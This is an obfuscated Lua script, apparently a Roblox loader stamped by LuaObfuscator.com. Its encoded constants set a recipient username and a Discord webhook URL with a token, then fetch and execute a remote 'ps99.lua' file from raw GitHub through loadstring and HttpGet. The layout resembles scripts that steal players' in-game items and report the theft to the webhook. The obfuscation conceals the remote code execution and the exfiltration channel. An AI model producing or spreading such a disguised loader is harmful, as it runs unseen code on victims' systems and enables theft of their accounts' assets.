--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.7) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==79) then local v82=0;while true do if (v82==0) then v19=v0(v3(v30,1,1));return "";end end else local v83=0;local v84;while true do if (v83==0) then v84=v2(v0(v30,16));if v19 then local v104=v5(v84,v19);v19=nil;return v104;else return v84;end break;end end end end);local function v20(v31,v32,v33) if v33 then local v85=(v31/((5 -3)^(v32-(2 -1))))%(((3 + 0) -1)^(((v33-(1 -0)) -(v32-(2 -1))) + (620 -(555 + 64)))) ;return v85-(v85%(932 -(857 + (1139 -(68 + 997))))) ;else local v86=568 -(367 + 201) ;local v87;while true do if (v86==(927 -((1484 -(226 + 1044)) + (3104 -2391)))) then v87=(1 + 1)^(v32-(1 + 0)) ;return (((v31%(v87 + v87))>=v87) and (878 -(282 + 595))) or (1637 -(1523 + 114)) ;end end end end local function v21() local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22() local v35,v36=v1(v16,v18,v18 + 2 );v18=v18 + (119 -(32 + 85)) ;return (v36 * (251 + 5)) + v35 ;end local function v23() local v37=0 + 0 + (0 -0) ;local v38;local v39;local v40;local v41;while true do if (v37==(958 -(892 + 65))) then return (v41 * (40022563 -(17095841 + 6149506))) + (v40 * (121138 -55602)) + (v39 * 256) + v38 ;end if (v37==((0 -0) -0)) then v38,v39,v40,v41=v1(v16,v18,v18 + (353 -((1039 -(802 + 150)) + 263)) );v18=v18 + 4 ;v37=181 -(67 + 113) ;end end end local function v24() local v42=0 -0 ;local v43;local v44;local v45;local v46;local v47;local v48;while true do if (v42==(3 -(773 -(201 + 571)))) then v47=v20(v44,16 + 5 ,31);v48=((v20(v44,1029 -(915 + (1220 -(116 + 1022))) )==(2 -1)) and  -(1 + 0)) or 1 ;v42=3 -0 ;end if (v42==(1187 -(1069 + 118))) then v43=v23();v44=v23();v42=(7 -5) -1 ;end if (v42==(6 -3)) then if (v47==(0 + (0 -0))) then if (v46==0) then return v48 * (0 -0) ;else local v105=0 + 0 ;while true do if (v105==(791 -(368 + 423))) then v47=1;v45=0 -(859 -(814 + 45)) ;break;end end end elseif (v47==2047) then return ((v46==(18 -(10 + 8))) and (v48 * ((3 -2)/(442 -(416 + 16 + 10))))) or (v48 * NaN) ;end return v8(v48,v47-((8047 -4781) -2243) ) * (v45 + (v46/((1 + 0 + 1)^(91 -(14 + 25))))) ;end if (v42==(439 -(145 + 293))) then v45=431 -(44 + 386) ;v46=(v20(v44,1487 -((3643 -2645) + 488) ,7 + 13 ) * ((2 + 0)^32)) + v43 ;v42=2;end end end local function v25(v49) local v50;if  not v49 then v49=v23();if (v49==(885 -(261 + 624))) then return "";end end v50=v3(v16,v18,(v18 + v49) -(1 -0) );v18=v18 + v49 ;local v51={};for v66=1081 -(1020 + 60) , #v50 do v51[v66]=v2(v1(v3(v50,v66,v66)));end return v6(v51);end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v52=(function() return 0 + 0 ;end)();local v53=(function() return;end)();local v54=(function() return;end)();local v55=(function() return;end)();local v56=(function() return;end)();local v57=(function() return;end)();local v58=(function() return;end)();local v59=(function() return;end)();while true do if (v52==0) then local v90=(function() return 0 + 0 ;end)();while true do if (v90~=2) then else v52=(function() return 1906 -(1881 + 24) ;end)();break;end if (v90~=1) then else v55=(function() return {};end)();v56=(function() return {};end)();v90=(function() return 2;end)();end if (v90==(0 -0)) then v53=(function() return function(v106,v107,v108) local v109=(function() return 1763 -(454 + 1309) ;end)();while true do if (0~=v109) then else local v120=(function() return 572 -(426 + 146) ;end)();while true do if (v120~=(0 + 0)) then else v106[v107-#"~" ]=(function() return v108();end)();return v106,v107,v108;end end end end end;end)();v54=(function() return {};end)();v90=(function() return 1 + 0 ;end)();end end end if (v52~=1) then else local v91=(function() return 0 -0 ;end)();local v92=(function() return;end)();while true do if (v91==(0 -0)) then v92=(function() return 0 -0 ;end)();while true do if (v92==(2 -1)) then v59=(function() return {};end)();for v115= #"{",v58 do local v116=(function() return 0 + 0 ;end)();local v117=(function() return;end)();local v118=(function() return;end)();local v119=(function() return;end)();while true do if (v116==(285 -(134 + 151))) then local v123=(function() return 0;end)();while true do if ((1665 -(970 + 695))==v123) then v117=(function() return 1024 -(706 + 318) ;end)();v118=(function() return nil;end)();v123=(function() return 1 -0 ;end)();end if (v123==(1991 -(582 + 1408))) then v116=(function() return 1;end)();break;end end end if (v116~=1) then else v119=(function() return nil;end)();while true do if (v117~=(0 -0)) then else local v165=(function() return 0 -0 ;end)();local v166=(function() return;end)();while true do if (0==v165) then v166=(function() return 0 + 0 ;end)();while true do if (v166==(701 -(271 + 429))) then v117=(function() return 1 + 0 ;end)();break;end if (v166~=(0 -0)) then else v118=(function() return v21();end)();v119=(function() return nil;end)();v166=(function() return 1;end)();end end break;end end end if (v117==(1087 -(461 + 625))) then if (v118== #"<") then v119=(function() return v21()~=(1824 -(1195 + 629)) ;end)();elseif (v118==(2 -0)) then v119=(function() return v24();end)();elseif (v118~= #"xnx") then else v119=(function() return v25();end)();end v59[v115]=(function() return v119;end)();break;end end break;end end end v92=(function() return 2;end)();end if (v92==(243 -(187 + 54))) then v52=(function() return 1173 -(418 + 753) ;end)();break;end if (v92~=(780 -(162 + 618))) then else local v110=(function() return 0 + 0 ;end)();while true do if (v110==(1 + 0)) then v92=(function() return 1 + 0 ;end)();break;end if (v110==(0 + 0)) then v57=(function() return {v54,v55,nil,v56};end)();v58=(function() return v23();end)();v110=(function() return 1 -0 ;end)();end end end end break;end end end if (v52~=(2 -0)) then else v57[ #"-19"]=(function() return v21();end)();for v94= #"}",v23() do local v95=(function() return 0;end)();local v96=(function() return;end)();while true do if (0~=v95) then else v96=(function() return v21();end)();if (v20(v96, #"{", #"}")~=0) then else local v111=(function() return 0 + 0 ;end)();local v112=(function() return;end)();local v113=(function() return;end)();local v114=(function() return;end)();while true do if (v111==0) then local v121=(function() return 1636 -(1373 + 263) ;end)();while true do if (v121==(1001 -(451 + 549))) then v111=(function() return 1 + 0 ;end)();break;end if (v121==(0 -0)) then v112=(function() return v20(v96,2, #"xxx");end)();v113=(function() return v20(v96, #"xnxx",1328 -(1249 + 73) );end)();v121=(function() return 1 -0 ;end)();end end end if (v111==(1387 -(746 + 638))) then if (v20(v113, #"xnx", #"xxx")== #"]") then v114[ #"0313"]=(function() return v59[v114[ #"http"]];end)();end v54[v94]=(function() return v114;end)();break;end if (v111~=(2 -1)) then else v114=(function() return {v22(),v22(),nil,nil};end)();if (v112==(0 -0)) then local v156=(function() return 0 + 0 ;end)();while true do if (v156~=0) then else v114[ #"xnx"]=(function() return v22();end)();v114[ #"http"]=(function() return v22();end)();break;end end elseif (v112== #"}") then v114[ #"xxx"]=(function() return v23();end)();elseif (v112==(2 -0)) then v114[ #"gha"]=(function() return v23() -((1 + 1)^(357 -(218 + 123))) ;end)();elseif (v112== #"-19") then local v184=(function() return 1581 -(1535 + 46) ;end)();local v185=(function() return;end)();while true do if ((0 + 0)~=v184) then else v185=(function() return 0;end)();while true do if ((0 + 0)==v185) then v114[ #"-19"]=(function() return v23() -((5 -3)^(576 -(306 + 254))) ;end)();v114[ #".com"]=(function() return v22();end)();break;end end break;end end end v111=(function() return 116 -(4 + 110) ;end)();end if (v111~=(1 + 1)) then else if (v20(v113, #" ", #"|")~= #",") then else v114[2]=(function() return v59[v114[3 -1 ]];end)();end if (v20(v113,1469 -(899 + 568) ,2 + 0 )~= #"\\") then else v114[ #"-19"]=(function() return v59[v114[ #"91("]];end)();end v111=(function() return 6 -3 ;end)();end end end break;end end end for v97= #"[",v23() do v55,v97,v28=(function() return v53(v55,v97,v28);end)();end return v57;end end end local function v29(v60,v61,v62) local v63=v60[1];local v64=v60[2 + 0 ];local v65=v60[8 -5 ];return function(...) local v68=v63;local v69=v64;local v70=v65;local v71=v27;local v72=3 -2 ;local v73= -(167 -(122 + 44));local v74={};local v75={...};local v76=v12("#",...) -(3 -2) ;local v77={};local v78={};for v88=1130 -(369 + 761) ,v76 do if ((v88>=v70) or (4782==1275)) then v74[v88-v70 ]=v75[v88 + 1 + 0 ];else v78[v88]=v75[v88 + 1 + 0 ];end end local v79=(v76-v70) + (1 -0) ;local v80;local v81;while true do local v89=65 -(30 + 35) ;while true do if (v89==(1 + 0)) then if (v81<=(1264 -(1043 + 214))) then if (v81<=(3 -0)) then if ((v81<=(3 -2)) or (796>=3791)) then if (v81>0) then local v124=v80[1214 -(323 + 889) ];local v125,v126=v71(v78[v124](v13(v78,v124 + (2 -(1899 -(260 + 1638))) ,v80[583 -(361 + 219) ])));v73=(v126 + v124) -(321 -(53 + (707 -(382 + 58)))) ;local v127=0 + 0 ;for v159=v124,v73 do v127=v127 + 1 + 0 ;v78[v159]=v125[v127];end else v62[v80[3]]=v78[v80[(3 -2) + 1 ]];end elseif (v81>(415 -(13 + 2 + 398))) then local v130=982 -(18 + 964) ;local v131;local v132;while true do if ((v130==1) or (569>=1591)) then v78[v131 + (3 -2) ]=v132;v78[v131]=v132[v80[3 + 1 ]];break;end if (v130==((0 -0) + (0 -0))) then v131=v80[2 + 0 ];v132=v78[v80[853 -(20 + 830) ]];v130=1 + 0 ;end end else local v133=v80[(1333 -(902 + 303)) -((254 -138) + 10) ];local v134,v135=v71(v78[v133](v13(v78,v133 + 1 + (0 -0) ,v80[1936 -(565 + 1368) ])));v73=(v135 + v133) -(739 -(542 + 196)) ;local v136=0 -0 ;for v162=v133,v73 do v136=v136 + (1 -0) ;v78[v162]=v134[v136];end end elseif ((v81<=(2 + 3)) or (4490<=89)) then if (v81>(3 + 1)) then do return;end else v78[v80[1 + 1 ]]=v62[v80[4 -1 ]];end elseif ((v81>(15 -9)) or (4983<1808)) then v78[v80[(1 + 3) -2 ]]();else v78[v80[2 + 0 ]]();end elseif ((3829>3769) and (v81<=(1562 -((2816 -(1121 + 569)) + 425)))) then if (v81<=(414 -((332 -(22 + 192)) + 287))) then if ((1485<=2904) and (v81>(31 -(706 -(483 + 200))))) then local v139=1121 -(118 + 1003) ;local v140;local v141;while true do if ((4269==4269) and (v139==(0 -(1463 -(1404 + 59))))) then v140=v80[379 -(142 + 235) ];v141=v78[v80[13 -10 ]];v139=1 + 0 ;end if ((387<=2782) and (v139==1)) then v78[v140 + (978 -(553 + 424)) ]=v141;v78[v140]=v141[v80[7 -3 ]];break;end end else v78[v80[2 + 0 ]]=v80[3 + 0 ];end elseif ((v81==(26 -16)) or (1899<=917)) then v62[v80[2 + 1 ]]=v78[v80[(2 -1) + 1 ]];else do return;end end elseif ((v81<=(8 + 5)) or (4312<=876)) then if (v81>(25 -(16 -3))) then local v146=0 -0 ;local v147;while true do if ((0 -0)==v146) then v147=v80[5 -3 ];v78[v147]=v78[v147](v13(v78,v147 + (1019 -(697 + 321)) ,v73));break;end end else local v148=v80[5 -(768 -(468 + 297)) ];v78[v148]=v78[v148](v13(v78,v148 + (2 -1) ,v73));end elseif (v81>(5 + 9)) then v78[v80[(563 -(334 + 228)) + 1 ]]=v80[14 -11 ];else v78[v80[755 -(239 + 514) ]]=v62[v80[1230 -(322 + 905) ]];end v72=v72 + (612 -(602 + 9)) ;break;end if (v89==(1189 -(449 + 740))) then v80=v68[v72];v81=v80[1 + 0 ];v89=(4486 -3156) -(797 + 532) ;end end end end;end return v29(v28(),{},v17)(...);end return v15("LOL!083O0003083O00557365726E616D6503103O006261746D616E666F726576657233303903073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F31323733312O36372O393834332O38353137392F4E4B396D49526279726C364D344869315F495075496E524E5441467A676A74704D416474546E4D3233356A6C52546B4C65727541542D6943704A38485F7832363835534A030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403413O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F7A616368656D7A686573746F6B69792F782F6D61696E2F70732O392E6C7561000C3O00120F3O00023O00120A3O00013O00120F3O00043O00120A3O00033O00120E3O00053O00120E000100063O00200300010001000700120F000300084O0002000100034O000C5O00022O00073O000100012O00053O00017O00",v9(),...);
